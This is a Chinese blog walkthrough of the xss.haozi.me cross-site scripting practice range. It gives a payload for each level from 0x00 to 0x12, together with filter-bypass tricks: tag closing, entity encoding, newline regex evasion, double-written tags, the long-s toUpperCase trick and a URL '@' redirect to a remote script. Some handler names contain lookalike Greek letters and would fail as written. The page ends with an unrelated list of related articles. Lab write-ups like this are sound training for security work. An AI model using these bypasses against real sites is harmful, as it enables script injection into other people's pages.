xss.haozi教程-史上最全详解

2023-10-11 17:59

本文主要是介绍xss.haozi教程-史上最全详解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

0x00

0x01

0x02

0x03 反引号替代括号

0x04 编码绕过

0x06 换行绕过

0x08 换行绕过

0x09

0x0A 引入漏洞页面

0x0B 编码绕过

0x0C 双写绕过

0x0D

0x0E 特殊符号绕过

0x0F

0x10

0x11

0x00

<script>alert(1)</script>

0x01

先尝试<script>alert(1)</script>

 前后都闭合标签即可

</textarea><script>alert(1)</script><textarea>

0x02

先尝试<script>alert(1)</script>

闭合

"><script>alert(1)</script>

或者先"闭合,鼠标再移到框中

"οnmοuseοver="alert(1)

0x03 反引号替代括号

先尝试<script>alert(1)</script>

发现过滤了()

`替代括号

<script>alert`1`</script>

0x04 编码绕过

本题过滤了()和`

使用实体编码的方式绕过

首先需要加一个svg标签,代表要解码后面的编码值

将(1)用ascii编码转unicode

在线Unicode编码转换工具(ES JSON在线工具)

<svg><script>alert&#40;1&#41;</script>

0x05

尝试<script>alert(1)</script>

发现被注释掉了

html注释

<!--这是单行注释-->

<!--

        这是多行注释

        这是多行注释

-->

我们尝试闭合注释

结合源码,发现-->会被替换成表情

因此用--!>来闭合

--!><script>alert(1)</script>

0x06 换行绕过

过滤了以auto/on开头,以=结尾的字符串,并且忽略大小写

可以利用换行绕过正则

直接将等于换第二行,=前面就是空的,同时不影响第一行内容的执行

onmousemove

=alert(1)

0x07 单标签

尝试<script>alert(1)</script>

以为是闭合标签

本题过滤了尖括号之间的内容,忽略大小写

利用浏览器的兼容性,右尖括号可以不用写

<body οnlοad="alert(1)"

0x08 换行绕过

尝试<script>alert(1)</script>

尝试闭合标签

发现本题将替换为/* 坏人 */

利用换行绕过

0x09

本题要求我们必须输入指定的网址

可以先闭合script标签,然后注释掉后面

https://www.segmentfault.com"></script><script>alert(1)</script>//


也可以
http://www.segmentfault.com"></script><img src=x οnerrοr="alert(1)
http://www.segmentfault.com"></script><body οnlοad="alert(1)"

 

0x0A 引入漏洞页面

要求包含网址和上题一样,还将常用符号转换成了编码形式

以@前的字符串作为用户名,来访问@后面的网址

https://www.segmentfault.com@xss.haozi.me/j.js

这里把www.segmentfault.com当成了登录后面网址的用户名

xss.haozi.me/j.js文件内存放着alert(1);

0x0B 编码绕过

发现将所有输入转换为大写输出

html不区分大小写,而js区分大小写

构造html代码:

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

或者实体编码绕过

将alert(1)进行HTML实体字符转换

在线Unicode编码转换工具(ES JSON在线工具)

<img src="" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C 双写绕过

在0x0B基础上过滤了script

利用双写绕过

<scrscriptipt src="https://www.segmentfault.com.haozi.me/j.js"></scrscriptipt>

或者
<img src="" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0D

发现输入全在注释内,还过滤了< / " '

//为单行注释,换行可以绕过

利用换行绕过注释,再用–>忽略后面的引号和括号

0x0E 特殊符号绕过

尝试

特殊符号绕过,ſ 经过toUpperCase函数会变成S

<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>


<ſcript src="https://xss.haozi.me/j.js" ></script>

0x0F

属性值中的HTML实体编码会被浏览器成功解析,所以此处的HTML实体编码毫无用处

先闭合console.error,再添加alert

');alert(1);//

0x10

可以先闭合给data赋值,然后alert(1)

1;alert(1)

也可以直接alert(1)

0x11

"被替换为\\"

但仍然可以闭合了前面的"

然后执行alert(1)语句,并用//注释后面的语句

所以此处的过滤也是毫无用处

");alert(1)//

0x12

")</script><script>alert(1)</script><!--

由于浏览器的容错性可以简写

</script>
<script>alert(1)</script>


xss.haozi 思路总结 0x00-0x12_图南yukino的博客-CSDN博客

xss靶场练习之xss.haozi.me解析及答案_钟情妺喜107的博客-CSDN博客

这篇关于xss.haozi教程-史上最全详解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/189845

相关文章

SQL BETWEEN 语句的基本用法详解

《SQLBETWEEN语句的基本用法详解》SQLBETWEEN语句是一个用于在SQL查询中指定查询条件的重要工具,它允许用户指定一个范围,用于筛选符合特定条件的记录,本文将详细介绍BETWEEN语... 目录概述BETWEEN 语句的基本用法BETWEEN 语句的示例示例 1:查询年龄在 20 到 30 岁

CSS place-items: center解析与用法详解

《CSSplace-items:center解析与用法详解》place-items:center;是一个强大的CSS简写属性,用于同时控制网格(Grid)和弹性盒(Flexbox)... place-items: center; 是一个强大的 css 简写属性,用于同时控制 网格(Grid) 和 弹性盒(F

spring中的ImportSelector接口示例详解

《spring中的ImportSelector接口示例详解》Spring的ImportSelector接口用于动态选择配置类,实现条件化和模块化配置,关键方法selectImports根据注解信息返回... 目录一、核心作用二、关键方法三、扩展功能四、使用示例五、工作原理六、应用场景七、自定义实现Impor

一文深入详解Python的secrets模块

《一文深入详解Python的secrets模块》在构建涉及用户身份认证、权限管理、加密通信等系统时,开发者最不能忽视的一个问题就是“安全性”,Python在3.6版本中引入了专门面向安全用途的secr... 目录引言一、背景与动机:为什么需要 secrets 模块?二、secrets 模块的核心功能1. 基

一文详解MySQL如何设置自动备份任务

《一文详解MySQL如何设置自动备份任务》设置自动备份任务可以确保你的数据库定期备份,防止数据丢失,下面我们就来详细介绍一下如何使用Bash脚本和Cron任务在Linux系统上设置MySQL数据库的自... 目录1. 编写备份脚本1.1 创建并编辑备份脚本1.2 给予脚本执行权限2. 设置 Cron 任务2

一文详解如何在idea中快速搭建一个Spring Boot项目

《一文详解如何在idea中快速搭建一个SpringBoot项目》IntelliJIDEA作为Java开发者的‌首选IDE‌,深度集成SpringBoot支持,可一键生成项目骨架、智能配置依赖,这篇文... 目录前言1、创建项目名称2、勾选需要的依赖3、在setting中检查maven4、编写数据源5、开启热

Python常用命令提示符使用方法详解

《Python常用命令提示符使用方法详解》在学习python的过程中,我们需要用到命令提示符(CMD)进行环境的配置,:本文主要介绍Python常用命令提示符使用方法的相关资料,文中通过代码介绍的... 目录一、python环境基础命令【Windows】1、检查Python是否安装2、 查看Python的安

HTML5 搜索框Search Box详解

《HTML5搜索框SearchBox详解》HTML5的搜索框是一个强大的工具,能够有效提升用户体验,通过结合自动补全功能和适当的样式,可以创建出既美观又实用的搜索界面,这篇文章给大家介绍HTML5... html5 搜索框(Search Box)详解搜索框是一个用于输入查询内容的控件,通常用于网站或应用程

Python中使用uv创建环境及原理举例详解

《Python中使用uv创建环境及原理举例详解》uv是Astral团队开发的高性能Python工具,整合包管理、虚拟环境、Python版本控制等功能,:本文主要介绍Python中使用uv创建环境及... 目录一、uv工具简介核心特点:二、安装uv1. 通过pip安装2. 通过脚本安装验证安装:配置镜像源(可

C++ 函数 strftime 和时间格式示例详解

《C++函数strftime和时间格式示例详解》strftime是C/C++标准库中用于格式化日期和时间的函数,定义在ctime头文件中,它将tm结构体中的时间信息转换为指定格式的字符串,是处理... 目录C++ 函数 strftipythonme 详解一、函数原型二、功能描述三、格式字符串说明四、返回值五